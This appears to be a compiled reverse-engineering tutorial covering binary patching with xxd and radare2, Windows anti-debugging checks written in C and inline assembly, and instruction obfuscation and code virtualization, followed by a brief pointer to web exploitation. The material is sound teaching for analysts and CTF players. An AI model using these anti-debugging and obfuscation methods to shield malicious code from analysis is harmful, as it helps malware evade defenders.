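Between the assembly examples and printf() there is a middle ground: glibc's generic syscall() wrapper lets C code issue a system call by number. The sketch below assumes Linux with glibc; the wrapper name raw_write is hypothetical.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes syscall() under strict -std=c11 */
#endif
#include <assert.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical wrapper: issue the write system call by number,
   bypassing the C library's write() and stdio buffering.
   Returns the number of bytes written, or -1 with errno set. */
long raw_write(int fd, const void *buf, size_t len)
{
    assert(buf != NULL);
    return syscall(SYS_write, fd, buf, len);
}
```

Calling raw_write(1, "hi\n", 3) would show up in strace as a single write(1, "hi\n", 3) line, just like the assembly versions above.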
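Patching binaries
What is a patch
Often we cannot obtain a program's source code and can only modify the binary directly. This is known as patching. You can edit the file's bytes with a hex editor or use semi-automated tools.
Patching takes several forms:
- patching a binary file (a program or a library)
- patching in memory (using a debugger)
- preloading a library that replaces functions of the original library
- triggers (hook, then patch at run time)
Manual patching
Patching by hand is naturally more laborious, but it gives a better understanding of how a binary is laid out and of how programs are linked and loaded. Many tools can do it, such as xxd, dd, gdb, and radare2.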
xxd
$ echo 01: 01 02 03 04 05 06 07 08 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 04 05 06 07 08 .........
$ echo 04: 41 42 43 44 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 41 42 43 44 08 ....ABCD.
The -r option converts a hexdump back into binary. Here we first create a binary file and then overwrite a few of its bytes.
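The same overwrite-at-offset operation is easy to express in C on an in-memory copy of the file. This is a minimal sketch with a hypothetical function name, patch_bytes; reading the file in and writing it back out are left to the caller.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: overwrite n bytes of buf starting at offset off.
   Returns 0 on success, or -1 if the patch would run past the buffer
   (unlike xxd -r, this sketch never extends the data). */
int patch_bytes(unsigned char *buf, size_t size, size_t off,
                const unsigned char *src, size_t n)
{
    assert(buf != NULL && src != NULL);
    if (off > size || n > size - off)
        return -1;
    memcpy(buf + off, src, n);
    return 0;
}
```

Applied to the nine bytes 00 through 08 with the patch 41 42 43 44 at offset 4, it produces the same bytes as the second xxd dump above.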
radare2
A simple example:
#include<stdio.h>
void main() {
printf("hello");
puts("world");
}
$ gcc -no-pie patch.c
$ ./a.out
helloworld
Next, by computing the function offsets, we replace printf with puts:
[0x004004e0]> pdf @ main
;-- main:
/ (fcn) sym.main 36
| sym.main ();
| ; DATA XREF from 0x004004fd (entry0)
| 0x004005ca 55 push rbp
| 0x004005cb 4889e5 mov rbp, rsp
| 0x004005ce 488d3d9f0000. lea rdi, str.hello ; 0x400674 ; "hello"
| 0x004005d5 b800000000 mov eax, 0
| 0x004005da e8f1feffff call sym.imp.printf ; int printf(const char *format)
| 0x004005df 488d3d940000. lea rdi, str.world ; 0x40067a ; "world"
| 0x004005e6 e8d5feffff call sym.imp.puts ; sym.imp.printf-0x10 ; int printf(const char *format)
| 0x004005eb 90 nop
| 0x004005ec 5d pop rbp
\ 0x004005ed c3 ret
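The instruction at address 0x004005da is call sym.imp.printf. The opcode byte e8 encodes call, and the four bytes that follow are a little-endian 32-bit displacement relative to the next instruction, so the displacement to sym.imp.printf is 0xfffffef1. The instruction at address 0x004005e6 is call sym.imp.puts, and the displacement to sym.imp.puts is 0xfffffed5.
Next, find the PLT addresses of the two functions: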
[0x004004e0]> is~printf
vaddr=0x004004d0 paddr=0x000004d0 ord=003 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.printf
[0x004004e0]> is~puts
vaddr=0x004004c0 paddr=0x000004c0 ord=002 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.puts
Compute the distance between them:
[0x004004e0]> ?v 0x004004d0-0x004004c0
0x10
So to replace printf with puts, it is enough to change the displacement to 0xfffffef1 - 0x10 = 0xfffffee1.
[0x004004e0]> s 0x004005da
[0x004005da]> wx e8e1feffff
[0x004005da]> pd 1
| 0x004005da e8e1feffff call sym.imp.puts ; sym.imp.printf-0x10 ; int printf(const char *format)
Done.
$ ./a.out
hello
world
The process can be simplified further by typing the assembly directly and letting r2 take care of the rest:
[0x004005da]> wa call 0x004004c0
Written 5 bytes (call 0x004004c0) = wx e8e1feffff
[0x004005da]> wa call sym.imp.puts
Written 5 bytes (call sym.imp.puts) = wx e8e1feffff
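The displacement arithmetic used in this section can be sketched in C. The function name encode_call is hypothetical; the formula itself (target minus the address of the instruction following the 5-byte call) is the standard encoding of the near relative call with opcode E8.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: build the 5-byte `call rel32` instruction that,
   when placed at call_addr, transfers control to target. The
   displacement is relative to the next instruction (call_addr + 5)
   and is stored little-endian. Returns the displacement. */
uint32_t encode_call(uint64_t call_addr, uint64_t target, uint8_t out[5])
{
    int64_t diff = (int64_t)(target - (call_addr + 5));
    assert(diff >= INT32_MIN && diff <= INT32_MAX);  /* must fit rel32 */

    uint32_t rel = (uint32_t)(int32_t)diff;
    out[0] = 0xe8;                         /* opcode: call rel32 */
    out[1] = (uint8_t)(rel & 0xff);
    out[2] = (uint8_t)((rel >> 8) & 0xff);
    out[3] = (uint8_t)((rel >> 16) & 0xff);
    out[4] = (uint8_t)((rel >> 24) & 0xff);
    return rel;
}
```

With call_addr 0x004005da and the puts PLT address 0x004004c0, the displacement is 0xfffffee1 and the bytes are e8 e1 fe ff ff, the same sequence written with wx above.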
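Patching with tools
patchkit
patchkit lets us patch ELF binaries with Python scripts.
Anti-debugging techniques
What is anti-debugging
Anti-debugging is an important software protection technique, valued especially in game protection. Malware also frequently uses anti-debugging to resist security analysis. When a program detects that it may be running under a debugger, it can change its normal execution path or modify itself so that it crashes, which increases the time and complexity of debugging.
Anti-debugging techniques
We first introduce several anti-debugging methods on Windows.
Function-based detection
Function-based detection uses documented or undocumented Windows functions to check directly whether the program is being debugged. The simplest debugger-detection function is IsDebuggerPresent():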
BOOL WINAPI IsDebuggerPresent(void);
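This function reads the BeingDebugged flag in the Process Environment Block (PEB). It returns a nonzero value if the process is running in the context of a debugger, and zero otherwise.
Example: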
BOOL CheckDebug()
{
return IsDebuggerPresent();
}
CheckRemoteDebuggerPresent() checks whether a specified process is being debugged:
BOOL WINAPI CheckRemoteDebuggerPresent(
_In_ HANDLE hProcess,
_Inout_ PBOOL pbDebuggerPresent
);
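If the process identified by the handle hProcess is running in the context of a debugger, the variable pointed to by pbDebuggerPresent is set to TRUE; otherwise it is set to FALSE.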
BOOL CheckDebug()
{
BOOL ret;
CheckRemoteDebuggerPresent(GetCurrentProcess(), &ret);
return ret;
}
NtQueryInformationProcess retrieves information about a given process:
NTSTATUS WINAPI NtQueryInformationProcess(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_Out_ PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);
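The second parameter, ProcessInformationClass, selects the type of process information to query. When it is 0 (ProcessBasicInformation) or 7 (ProcessDebugPort), debugging-related information can be obtained; the result is written to the buffer pointed to by the third parameter, ProcessInformation.
Example: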
BOOL CheckDebug()
{
    DWORD dbgPort = 0;
    HMODULE hModule = LoadLibrary("Ntdll.dll");
    /* NtQueryInformationProcessPtr is assumed to be a function-pointer typedef matching the prototype above */
    NtQueryInformationProcessPtr NtQueryInformationProcess = (NtQueryInformationProcessPtr)GetProcAddress(hModule, "NtQueryInformationProcess");
    /* 7 = ProcessDebugPort */
    NtQueryInformationProcess(GetCurrentProcess(), 7, &dbgPort, sizeof(dbgPort), NULL);
    return dbgPort != 0;
}
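Data-based detection
Data-based detection means that the program tests data at key locations related to debugging to decide whether it is being debugged, for example the BeingDebugged field of the PEB mentioned above. The program locates these data addresses directly and tests their contents, which avoids calling any function and makes its behavior stealthier.
Example: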
BOOL CheckDebug()
{
int BeingDebug = 0;
__asm
{
mov eax, dword ptr fs:[30h] ; eax = base address of the PEB
movzx eax, byte ptr [eax+2] ; PEB.BeingDebugged is at offset 2
mov BeingDebug, eax
}
return BeingDebug != 0;
}
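Because a process started under a debugger creates its heaps slightly differently from a normally started one, the system consults an undocumented field at offset 0x68 of the PEB (commonly known as NtGlobalFlag) to decide how to create heap structures. If the value at this location is 0x70, the process is running under a debugger.
Example: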
BOOL CheckDebug()
{
int BeingDbg = 0;
__asm
{
mov eax, dword ptr fs:[30h]
mov eax, dword ptr [eax + 68h]
and eax, 0x70
mov BeingDbg, eax
}
return BeingDbg != 0;
}
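The value 0x70 is not arbitrary: it is the bitwise OR of three heap-debugging flags. The Python sketch below only decodes such a value; it does not read the PEB. The constant names follow the commonly documented FLG_* flag names, and describe_nt_global_flag is a hypothetical helper introduced here for illustration.

```python
# Heap-debugging bits commonly documented for the PEB field at offset 0x68
# (NtGlobalFlag on 32-bit Windows).
FLG_HEAP_ENABLE_TAIL_CHECK = 0x10
FLG_HEAP_ENABLE_FREE_CHECK = 0x20
FLG_HEAP_VALIDATE_PARAMETERS = 0x40

DEBUG_HEAP_MASK = (FLG_HEAP_ENABLE_TAIL_CHECK
                   | FLG_HEAP_ENABLE_FREE_CHECK
                   | FLG_HEAP_VALIDATE_PARAMETERS)


def describe_nt_global_flag(value):
    """Return the names of the heap-debugging flags set in value (hypothetical helper)."""
    names = {
        FLG_HEAP_ENABLE_TAIL_CHECK: "FLG_HEAP_ENABLE_TAIL_CHECK",
        FLG_HEAP_ENABLE_FREE_CHECK: "FLG_HEAP_ENABLE_FREE_CHECK",
        FLG_HEAP_VALIDATE_PARAMETERS: "FLG_HEAP_VALIDATE_PARAMETERS",
    }
    return [name for bit, name in names.items() if value & bit]


print(hex(DEBUG_HEAP_MASK))           # 0x70
print(describe_nt_global_flag(0x70))  # all three flag names
```

This is why the assembly above masks with 0x70 and treats any remaining bit as a sign of a debugger.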
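Symbol Detection
Symbol detection mainly targets debuggers or monitors that use a driver. After starting, such tools create a symbolic link for their driver so that user-mode code can communicate with it. Because these symbolic link names are usually fixed, they can be used to determine whether the corresponding debugging software is present.
Example: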
BOOL CheckDebug()
{
HANDLE hDevice = CreateFileA("\\\\.\\PROCEXP153", GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
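if (hDevice != INVALID_HANDLE_VALUE) // CreateFileA returns INVALID_HANDLE_VALUE on failure, not NULL
{
CloseHandle(hDevice);
return 0; // device opened: the monitoring tool is present
}
return 1;
}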
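Window Detection
Window detection checks whether a specific debugger window exists on the current desktop to determine whether a debugger is present. It cannot tell whether that debugger is actually debugging this program.
Example: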
BOOL CheckDebug()
{
if (FindWindowA("OllyDbg", 0))
{
return 0;
}
return 1;
}
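Signature Detection
Signature detection enumerates the running processes and searches each process's memory for a code fragment specific to a particular debugger.
For example, OllyDbg contains the following signature: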
0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00
Example:
BOOL CheckDebug()
{
BYTE sign[] = {0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00};
PROCESSENTRY32 sentry32 = {0};
sentry32.dwSize = sizeof(sentry32);
HANDLE phsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32First(phsnap, &sentry32);
do{
HANDLE hps = OpenProcess(MAXIMUM_ALLOWED, FALSE, sentry32.th32ProcessID);
if (hps != 0)
{
DWORD szReaded = 0;
BYTE signRemote[sizeof(sign)];
ReadProcessMemory(hps, (LPCVOID)0x4f632a, signRemote, sizeof(signRemote), &szReaded);
if (szReaded > 0)
{
if (memcmp(sign, signRemote, sizeof(sign)) == 0)
{
CloseHandle(phsnap);
return 0;
}
}
CloseHandle(hps);
}
sentry32.dwSize = sizeof(sentry32);
}while(Process32Next(phsnap, &sentry32));
CloseHandle(phsnap);
return 1;
}
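It helps to see what the signature bytes actually encode. The Python sketch below decodes them as UTF-16LE text and shows a plain substring search over a byte buffer. The buffer stands in for memory read from another process, and contains_signature is a hypothetical helper, not part of any real tool.

```python
# The signature bytes from the text, copied verbatim.
SIGN = bytes([
    0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
    0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
    0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
    0x4b, 0x00, 0x00, 0x00,
])


def contains_signature(memory, signature=SIGN):
    """Return True if the signature occurs anywhere in the given bytes."""
    return memory.find(signature) != -1


# The bytes are two NUL-terminated UTF-16LE strings.
decoded = SIGN.decode("utf-16-le")
print(repr(decoded))  # 'About OllyDbg\x00OK\x00'

# A stand-in for memory read out of another process.
fake_memory = b"\x90" * 8 + SIGN + b"\x90" * 8
print(contains_signature(fake_memory))  # True
```

The C example reads from one fixed address (0x4f632a), so it only matches a specific OllyDbg build; searching a whole region, as sketched here, is slower but less brittle.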
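Behavior Detection
Behavior detection means the program uses code to sense differences between running under a debugger and running normally. For example, stepping over two instructions in a debugger takes far longer than the CPU needs to execute them normally, so the rdtsc instruction can be used to test for this. (This instruction reads the time-stamp counter into the EDX:EAX register pair.)
Example: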
BOOL CheckDebug()
{
int BeingDbg = 0;
__asm
{
rdtsc
mov ecx, edx
rdtsc
sub edx, ecx
mov BeingDbg, edx
}
if (BeingDbg > 2)
{
return 0;
}
return 1;
}
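The same timing idea can be sketched without inline assembly. The Python example below uses time.perf_counter_ns in place of rdtsc and compares the elapsed time against a threshold. The function names and the threshold values are assumptions chosen for illustration; a real check would have to be calibrated for the target machine.

```python
import time


def elapsed_ns(work):
    """Run work() and return how long it took in nanoseconds."""
    start = time.perf_counter_ns()
    work()
    return time.perf_counter_ns() - start


def looks_single_stepped(work, threshold_ns):
    """Guess that someone is stepping through work() if it ran far too slowly."""
    return elapsed_ns(work) > threshold_ns


# A trivial operation finishes well within a generous five-second budget.
print(looks_single_stepped(lambda: None, 5_000_000_000))

# A 50 ms pause stands in for a human pressing "step" in a debugger.
print(looks_single_stepped(lambda: time.sleep(0.05), 10_000_000))
```

Timing checks are noisy: scheduling delays or a loaded system can also exceed the threshold, so such a check can produce false positives.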
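Breakpoint Detection
Breakpoint detection relies on how debuggers set breakpoints to check whether breakpoints have been placed in the program's code. Debuggers generally set code breakpoints in one of two ways:
- Replacing a code instruction with INT3 (machine code 0xCC), which triggers a software exception
- Setting a hardware breakpoint through the hardware debug registers
For software breakpoints, the detection code scans important code regions for unexpected INT3 instructions.
Example: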
BOOL CheckDebug()
{
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS32 pNtHeaders;
PIMAGE_SECTION_HEADER pSectionHeader;
DWORD dwBaseImage = (DWORD)GetModuleHandle(NULL);
pDosHeader = (PIMAGE_DOS_HEADER)dwBaseImage;
pNtHeaders = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader + pDosHeader->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(pNtHeaders->Signature) + sizeof(IMAGE_FILE_HEADER) +
(WORD)pNtHeaders->FileHeader.SizeOfOptionalHeader);
DWORD dwAddr = pSectionHeader->VirtualAddress + dwBaseImage;
DWORD dwCodeSize = pSectionHeader->SizeOfRawData;
BOOL Found = FALSE;
__asm
{
cld
mov edi,dwAddr
mov ecx,dwCodeSize
mov al,0CCH
repne scasb ; search the ECX-byte buffer at EDI for the byte in AL
jnz NotFound
mov Found,1
NotFound:
}
return Found;
}
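The scan performed by repne scasb amounts to a byte search. The Python sketch below does the same over a bytes object and reports the address of every 0xCC byte. The sample buffers and the find_int3 helper are made up for illustration.

```python
def find_int3(code, base=0):
    """Return the address of every 0xCC byte in code, offset by base."""
    return [base + i for i, byte in enumerate(code) if byte == 0xCC]


# push eax; push ebx; xor eax, eax; pop ebx; pop eax
clean = bytes([0x50, 0x53, 0x31, 0xC0, 0x5B, 0x58])

# The same code after a debugger replaced "push ebx" with INT3.
patched = bytes([0x50, 0xCC, 0x31, 0xC0, 0x5B, 0x58])

print(find_int3(clean))                                   # []
print([hex(a) for a in find_int3(patched, 0x01003689)])   # ['0x100368a']
```

A byte-level scan like this is naive: 0xCC can legitimately appear inside an operand or as padding between functions, so a practical check usually compares against a known-good copy or checksum instead.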
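For hardware breakpoints, a program running in user mode under protected mode cannot access the debug registers directly, so it usually has to set up an exception handler to obtain the DR register values. The example below reads them from the thread context instead.
Example: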
BOOL CheckDebug()
{
CONTEXT context;
HANDLE hThread = GetCurrentThread();
context.ContextFlags = CONTEXT_DEBUG_REGISTERS;
GetThreadContext(hThread, &context);
if (context.Dr0 != 0 || context.Dr1 != 0 || context.Dr2 != 0 || context.Dr3!=0)
{
return 1;
}
return 0;
}
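Behavior Occupation
Behavior occupation means that the protected program claims for itself a capability that only one instance can hold at a time. For example, a process can normally be debugged by only one debugger at a time, so the program can be designed to start itself under its own debugger and use the system's debugging mechanism to keep other debuggers from attaching.
Instruction Obfuscation
Why Instruction Obfuscation Is Needed
The security of software depends heavily on how hard the code is for an analyst to understand once it has been made complex. Instruction obfuscation transforms the original instructions into equivalent but far more complicated ones, raising the cost of analysis and cracking as much as possible.
Common Obfuscation Methods
Code Mutation
Code mutation converts one or more instructions into one or more other, equivalent instructions. Mutating a single instruction is called local mutation; mutating several instructions considered together is called global mutation.
For example, an assignment instruction such as: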
mov eax, 12345678h
can be replaced with the following combination of instructions:
push 12345678h
pop eax
Going a step further:
pushfd
mov eax, 1234h
shl eax, 10h
mov ax, 5678h
popfd
pushfd and popfd protect the EFLAGS register from the side effects of the mutated instructions.
Continuing the substitution:
pushfd
push 1234h
pop eax
shl eax, 10h
mov ax, 5678h
popfd
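As a result, even a simple instruction can turn into hundreds or thousands of instructions, which makes the code much harder to understand.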
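The equivalence of the mutated sequence can be checked with ordinary integer arithmetic. The Python sketch below models EAX as a 32-bit value and reads the constants as hexadecimal (1234h, a shift of 10h = 16 bits, 5678h). The helper names are hypothetical.

```python
MASK32 = 0xFFFFFFFF


def mov_ax(eax, value16):
    """Model "mov ax, imm16": replace only the low 16 bits of EAX."""
    return (eax & 0xFFFF0000) | (value16 & 0xFFFF)


def mutated_load():
    eax = 0x1234                  # mov eax, 1234h
    eax = (eax << 0x10) & MASK32  # shl eax, 10h
    eax = mov_ax(eax, 0x5678)     # mov ax, 5678h
    return eax


print(hex(mutated_load()))  # 0x12345678
```

The three-instruction form leaves the same value in EAX as the single mov eax, 12345678h; the only side effect is on the flags, which is what the pushfd/popfd pair guards against.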
Consider another example:
jmp {label}
can become:
push {label}
ret
Moreover, IDA does not recognize this push/ret pattern as a jump to the label.
The instruction:
call {label}
can be replaced with:
push {label of the instruction after the call}
push {label}
ret
The instruction:
push {op}
can be replaced with:
sub esp, 4
mov [esp], {op}
Now consider global mutation. Take the following code:
mov eax, ebx
mov ecx, eax
Because the two instructions are related, they must be considered together during mutation, for example:
mov cx, bx
mov ax, cx
mov ch, bh
mov ah, bh
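This interdependence makes it harder to derive the original code from the mutated code.
Junk Instructions
Junk instructions are instructions inserted into the original code that can be executed but have no effect. They exist only to disrupt analysis, both for the human analyst and for disassemblers and debuggers.
Consider an example. The original instructions are: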
add eax, ebx
mul ecx
After adding junk instructions:
xor esi, 011223344h
add esi, eax
add eax, ebx
mov edx, eax
shl edx, 4
mul ecx
xor esi, ecx
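The inserted instructions use the esi and edx registers, which the original program does not use. These are pure garbage instructions.
Some junk code is designed to confuse the disassembler, for example: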
01003689 50 push eax
0100368A 53 push ebx
After adding junk bytes:
01003689 50 push eax
0100368A EB 01 jmp short 0100368D
0100368C FF53 6A call dword ptr [ebx+6A]
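This looks strange at first, but it happens because the inserted machine code EB 01 FF causes a linear-sweep disassembler to misdecode the bytes. At run time, the second instruction jumps to the correct location, and the flow is: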
01003689 50 push eax
0100368A EB 01 jmp short 0100368D
0100368C 90 nop
0100368D 53 push ebx
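The difference between the two listings can be reproduced with a toy decoder. The Python sketch below understands only the handful of opcodes that appear above and decodes the same bytes twice: once strictly in address order (linear sweep) and once by following the jump. It is an illustration under those assumptions, not a real disassembler, and the trailing 6A byte is simply whatever follows in the program, as in the listing.

```python
# Bytes from the listing: push eax; jmp short +1; junk FF; push ebx; next byte 6A
CODE = bytes([0x50, 0xEB, 0x01, 0xFF, 0x53, 0x6A])


def decode(code, off):
    """Return (length, text, jump_target) for the instruction at offset off."""
    op = code[off]
    if op == 0x50:
        return 1, "push eax", None
    if op == 0x53:
        return 1, "push ebx", None
    if op == 0xEB:  # jmp short rel8, target is relative to the next instruction
        rel = code[off + 1]
        rel = rel - 256 if rel > 127 else rel
        return 2, "jmp short", off + 2 + rel
    if op == 0xFF and code[off + 1] == 0x53:  # call dword ptr [ebx+disp8]
        return 3, "call dword ptr [ebx+%02X]" % code[off + 2], None
    raise ValueError("unsupported opcode %#x" % op)


def linear_sweep(code, count):
    """Decode count instructions one after another, ignoring jumps."""
    out, off = [], 0
    for _ in range(count):
        length, text, _target = decode(code, off)
        out.append(text)
        off += length
    return out


def follow_flow(code, count):
    """Decode count instructions, continuing at the target of each jump."""
    out, off = [], 0
    for _ in range(count):
        length, text, target = decode(code, off)
        out.append(text)
        off = target if target is not None else off + length
    return out


print(linear_sweep(CODE, 3))  # ['push eax', 'jmp short', 'call dword ptr [ebx+6A]']
print(follow_flow(CODE, 3))   # ['push eax', 'jmp short', 'push ebx']
```

The linear sweep swallows the real push ebx as part of a bogus call, while the flow-following decoder skips the junk byte and recovers the original instruction.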
Scrambling the Instruction Sequence
Instructions are normally executed in a certain order, for example:
01003689 push eax
0100368A push ebx
0100368B xor eax, eax
0100368D cmp eax, 0
01003690 jne short 01003695
01003692 inc eax
01003693 jmp short 0100368D
01003695 pop ebx
01003696 pop eax
The sequence is easy to read, so scrambling the instruction sequence rearranges the instructions to confuse the analyst:
01003689 push eax
0100368A jmp short 01003694
0100368C xor eax, eax
0100368E jmp short 01003697
01003690 jne short 0100369F
01003692 jmp short 0100369C
01003694 push ebx
01003695 jmp short 0100368C
01003697 cmp eax, 0
0100369A jmp short 01003690
0100369C inc eax
0100369D jmp short 01003697
0100369F pop ebx
010036A0 pop eax
Although it looks messy, the actual execution order is unchanged.
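That claim can be checked mechanically. The Python sketch below is a deliberately tiny emulator that models only EAX and the zero flag, runs both listings, and records every instruction executed other than the unconditional jumps. The emulator and its starting state are assumptions made for illustration; the addresses and instructions are taken from the two listings.

```python
ORIGINAL = [
    (0x01003689, "push eax"), (0x0100368A, "push ebx"),
    (0x0100368B, "xor eax, eax"), (0x0100368D, "cmp eax, 0"),
    (0x01003690, "jne 01003695"), (0x01003692, "inc eax"),
    (0x01003693, "jmp 0100368D"), (0x01003695, "pop ebx"),
    (0x01003696, "pop eax"),
]

SCRAMBLED = [
    (0x01003689, "push eax"), (0x0100368A, "jmp 01003694"),
    (0x0100368C, "xor eax, eax"), (0x0100368E, "jmp 01003697"),
    (0x01003690, "jne 0100369F"), (0x01003692, "jmp 0100369C"),
    (0x01003694, "push ebx"), (0x01003695, "jmp 0100368C"),
    (0x01003697, "cmp eax, 0"), (0x0100369A, "jmp 01003690"),
    (0x0100369C, "inc eax"), (0x0100369D, "jmp 01003697"),
    (0x0100369F, "pop ebx"), (0x010036A0, "pop eax"),
]


def executed_instructions(listing):
    """Run a listing and return the non-jmp instructions in execution order."""
    addresses = [addr for addr, _ in listing]
    code = dict(listing)
    eax, zero_flag = 5, False  # arbitrary starting state
    pc, executed = addresses[0], []
    while pc is not None:
        text = code[pc]
        index = addresses.index(pc)
        fallthrough = addresses[index + 1] if index + 1 < len(addresses) else None
        mnemonic, _, operand = text.partition(" ")
        if mnemonic == "jmp":  # only redirects control; left out of the trace
            pc = int(operand, 16)
            continue
        if mnemonic == "jne":  # taken when the zero flag is clear
            executed.append("jne")
            pc = fallthrough if zero_flag else int(operand, 16)
            continue
        executed.append(text)
        if text == "xor eax, eax":
            eax, zero_flag = 0, True
        elif text == "cmp eax, 0":
            zero_flag = (eax == 0)
        elif text == "inc eax":
            eax += 1
            zero_flag = (eax == 0)
        pc = fallthrough
    return executed


print(executed_instructions(ORIGINAL) == executed_instructions(SCRAMBLED))  # True
```

Both listings execute the same ten instructions in the same order; the scrambled version only adds unconditional jumps between them.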
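Multiple Branches
Multiple branching uses different conditional jump instructions to complicate the program's execution flow. Unlike scrambling the instruction sequence, multiple branching changes the program's execution flow. For example: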
01003689 push eax
0100368A push ebx
0100368B push ecx
0100368C push edx
After transformation:
01003689 push eax
0100368A je short 0100368F
0100368C push ebx
0100368D jmp short 01003690
0100368F push ebx
01003690 push ecx
01003691 push edx
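A conditional branch has been added, but we do not care whether it is taken. The program now has an element of uncertainty that can only be resolved at run time. What is certain is that this code produces the same result as the original.
As a further improvement, replace the code on one branch with different code: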
01003689 push eax
0100368A je short 0100368F
0100368C push ebx
0100368D jmp short 01003693
0100368F push eax
01003690 mov dword ptr [esp], ebx
01003693 push ecx
01003694 push edx
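Opaque Predicates
An opaque predicate is an expression whose value at a given point is known to the programmer but cannot be deduced by a compiler or static analyzer, so it can only be determined at run time. The multiple-branch technique above also relies on opaque predicates.
In the code below: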
mov esi, 1
... ; some code not touching esi
dec esi
...
cmp esi, 0
jz real_code
; fake luggage
real_code:
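Assuming we know that esi must be 0 here, we can insert instructions of arbitrary length and complexity at the fake luggage location to obfuscate the code.
Other examples include (again assuming esi is 0):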
add eax, ebx
mul ecx
add eax, esi
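The esi examples depend on a value planted earlier in the code. Another commonly used kind of opaque predicate relies on an arithmetic identity instead. The Python sketch below swaps in that variant: x * (x + 1) is a product of two consecutive integers and therefore always even, so the second branch can never run. The function names and the junk expression are made up for illustration.

```python
def real_computation(a, b, c):
    """The unobfuscated logic: the add/mul pair from the example above."""
    return (a + b) * c


def obfuscated(a, b, c, x):
    # Opaque predicate: always true, whatever integer x holds at run time.
    if (x * (x + 1)) % 2 == 0:
        return (a + b) * c
    # Dead code that only exists to mislead whoever reads the listing.
    return (a ^ 0x11223344) - c


print(obfuscated(2, 3, 4, 12345) == real_computation(2, 3, 4))  # True
```

A static analyzer that cannot prove the identity has to treat both branches as reachable, which is exactly the extra work the obfuscator wants to create.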
Indirect Pointers
dummy_data1 db 100h dup (0)
message1 db 'hello world', 0
dummy_data2 db 200h dup (0)
message2 db 'another message', 0
func proc
...
mov eax, offset dummy_data1
add eax, 100h
push eax
call dump_string
...
mov eax, offset dummy_data2
add eax, 200h
push eax
call dump_string
...
func endp
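Here message is referenced indirectly through dummy_data, so IDA cannot correctly identify the references to message.
Code Virtualization
Virtual-machine-based code protection can also be regarded as a form of code obfuscation, and it currently offers the strongest protection among obfuscation techniques. Put simply, it uses a large amount of emulation code to simulate the execution of the protected code and compute the same result the protected code would have produced.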
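+------------------------------+
| Head instruction sequence    | -------> | Code VM entry                           |
|------------------------------|          |                                         |
|                              |          | Save the code context                   |
|                              |          |                                         |
| Middle instruction sequence  |          | Emulate the middle instruction sequence |
|                              |          |                                         |
|                              |          | Set up the new code context             |
|------------------------------|          |                                         |
| Tail instruction sequence    | <------- | Code VM exit                            |
+------------------------------+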
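When the original code reaches the start of the protected instruction sequence, execution transfers to the entry of the code virtual machine. The VM saves the current thread's context and then enters the emulation phase, which is the core of the code virtual machine. There are two ways to keep the VM code and the original code from conflicting over stack space: allocate new space on the heap, or keep using the stack space of the original code. Each has advantages and disadvantages; in practice the second is used more often.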
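There are likewise two approaches to emulating the original code. The first converts the original instruction sequence into code data that has a direct or indirect correspondence with it and that only the virtual machine understands, for example using 0 to represent push and 1 to represent mov. This directly or indirectly equivalent data is called the opcode. The second converts the meaning of the original code directly into new code, similar to code mutation; because it is based on instruction semantics, it is very difficult to design.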
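The opcode approach can be sketched as a very small interpreter. In the Python example below, 0 and 1 stand for push and mov as in the text; the remaining opcode numbers, the register names used as operands, and the run function are assumptions made for illustration. Real protectors use far larger and deliberately convoluted instruction sets.

```python
OP_PUSH, OP_MOV = 0, 1          # numbering taken from the text
OP_POP, OP_ADD, OP_MUL = 2, 3, 4  # hypothetical additions for this sketch


def run(bytecode, registers):
    """Interpret bytecode against a copy of the saved register context."""
    regs = dict(registers)  # "save the code context": work on a copy
    stack = []
    for opcode, dst, src in bytecode:
        if opcode == OP_PUSH:
            stack.append(regs[dst])
        elif opcode == OP_POP:
            regs[dst] = stack.pop()
        elif opcode == OP_MOV:
            regs[dst] = regs[src]
        elif opcode == OP_ADD:
            regs[dst] = (regs[dst] + regs[src]) & 0xFFFFFFFF
        elif opcode == OP_MUL:
            regs[dst] = (regs[dst] * regs[src]) & 0xFFFFFFFF
        else:
            raise ValueError("unknown opcode %r" % opcode)
    return regs  # "set up the new code context" for the native code


# Virtualized form of: eax = (eax + ebx) * ecx, with a detour through the stack.
PROGRAM = [
    (OP_PUSH, "ebx", None),
    (OP_POP, "edx", None),
    (OP_ADD, "eax", "edx"),
    (OP_MUL, "eax", "ecx"),
]

result = run(PROGRAM, {"eax": 2, "ebx": 3, "ecx": 4, "edx": 0})
print(result["eax"])  # 20
```

An analyst looking at the protected binary sees only the interpreter loop and a table of numbers, and has to recover the meaning of each opcode before the original logic becomes readable.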
Web Exploitation
https://ctf101.org/web-exploitation/overview/
Websites all around the world are programmed using various programming languages. While the developer should be aware of specific vulnerabilities in each programming language, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
